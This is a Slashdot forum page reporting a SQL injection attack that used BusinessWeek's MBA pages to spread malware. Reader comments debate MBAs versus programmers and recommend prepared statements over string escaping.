Slashdot Mirror
SQL Injection Turns BusinessWeek Into Viral Replicator
martins writes "The website of popular magazine BusinessWeek has been attacked via SQL injection in an attempt to infect its readership with malware. Hundreds of pages in a section of BusinessWeek's website which offers information about where MBA students might find future employers have been affected."
You haven't seen the modern MBA have you. Almost half of the MBA students have Computer Science Degrees and have been working professional for at least 5 years. Many of them while good at what they do, wants to further their career so go for an MBA so they be considered qualified for promotion. Not every one wants to be a basic programmer for the rest of their life, they much rather have influence in the process and the design and less time doing the drudge work.
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
TFA: "the code injected into BusinessWeek's website points to a Russian website that is currently down and not delivering further malicious code."
Seriously? Why is it that these people always point to their site? wouldn't you figure that, with a bit of injection, they could put the damn thing in the database? It's never made any sense to me. Anyone have any insights?
Also, they always waste these opportunities to give replace real headlines with those from the Onion... if they're going to do something malicious, they should at least do it with style...
Many of them while good at what they do
Not every one wants to be a basic programmer for the rest of their life
Pretty much all of the *GOOD* programmers *DO* want to program for the rest of their lives (while I wouldn't say "basic programmer"....most want to be Dev Lead / Architect type of coders, but coders none the less). And being Dev Lead / Architect is not the type of position that goes to the MBA grads.....MBAs are for people who want to go into Management / Project Management.
I've been in the industry since 1994 and am one of the top database developers in my company. And I don't see myself as being a manager any time soon. I enjoy programming too much. [This is in a large corporation where a manager is not a technical manager; small companies where "Dev Lead" equates to manager might be a different situation.]
Layne
I never understood how SQL injection happened on major sites until it happened to someone I know. (wow that sounded like a bad plug for some unknown disease... anyway...) Initially he absolutely refused to believe that it was SQL injection because, "His application wasn't vulnerable to that!". Finally, in the face of overwhelming truth it dawned on him that it was... so what happened? Oh, the database got cleaned up from a back up... but no code was changed. Then they did it again a short while later and he caught a clue and fixed it up. So, sadly... I've seen people do the same thing - it happens.
You are using English. Please learn the difference between loose and lose; they're, there, and their; your and you're.
They just don't teach anything about security in schools. We interviewed an intern candidate this spring and asked her how one would avoid a SQL injection attack.
Her response: "Don't use Microsoft products."
Swing and a miss!
The candidate's sample code had a big 'ol SQL injection vulnerability. Yet the instructor raved over his project.
The fact that "mysql_real_escape_string" or whatever exists is an example of that: String escaping relies on string manipulation tricks to make things "secure". On top of being potentially vulnerable to any problem in the server (which obviously cannot be gotten around of), it is also vulnerable to anything on the language side: for example, a string vulnerability would also make your queries vulnerable. Two attack vectors.
Its a workaround, a cheat, a hack. A prepared statement is handled by the driver and/or by the server itself, to compile your statement, and then pass the parameters (like you would a stored procedure or a function) at the binary level, on a RDBMS by RDBMS basis... That is, the vulnerabilities at the string level of MySQL are not the same as Postgres which are not the same as Oracle, DB2, or SQLServer, etc.
On top of that, prepared statements will (in most RBDMS) compile and cache the statement, and be able to reuse it whenever is needed (basically, whenever the query is the same except for the parameters), which enhance performance.
So there's simply no reason to use string escaping, and hasn't been ages.
I'd be really curious to know what he thought of it afterwards, and whether having an MBA really helped him understand this other world. I get the distinct impression that an MBA is the business-world equivalent of an MSCE: it gives you some basic knowledge and impresses the clueless but isn't really very useful.
If you mod me Overrated, you are admitting that you have no penis.
Just a quick question: why, exactly, do MBAs need to know calculus?
Please, I'm not following.
"In the fall of 1972 President Nixon announced that the rate of increase of inflation was decreasing. This was the first time a sitting president used the third derivative to advance his case for reelection." http://www.daviddarling.info/encyclopedia/D/derivative.html
Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
no to be a good architect you have to have DOMAIN knowledge, not business knowledge. You don't have to know how to turn a profit or what an ROI is. You have to have technical knowledge of the requirements and the varied means which you could possibly implement a solution with.
the masters in CS probably wouldnt be needed because these "business environments" you speak of never tend to do anything cutting edge in terms of the things that you do in getting a masters in CS; further research into Computer Science, not becoming a better programmer.
and for the love of god stop talking about writing databases like its "coding". A database developer is not a coder or a programmer. Someone who actually writes programs to interact with the database is.
It doesnt take a genious to write a hit song, or invent a brilliant product either, it takes ingenuity and creativity mixed with some experience. But your job isnt to be a "good programmer" its to be a good software engineer.
It doesnt take a genious to write Hello World; but it might take more of genious to realize he doesnt need to write hello world anymore, he can write a program to do it for him.
all in all you sound increasingly full of it.
lol "creating the code is a piece of cake"
sorta like typing a book is a piece of cake too, its figuring out what to right thats the challenge. And god forbid you knew anything about software development you'd be unit testing the software you wrote.
in short, if you want to be software architect knowing something about the field your software is in is just a bit more important than knowing about "business". Knowing the figures and profit margins and the financial business strategy not so important. Understand the technical domain of the software you are developing, how clients would use your software, and experience using and designing software in similar fields (especially using Go4 patterns) far more important.
thanks for demonstrating the pig headed naivety that you can always throw a couple more "business minded managers" at a problem to solve it.
"Jazz isn't dead, it just smells funny" ~Frank Zappa
EdelFactor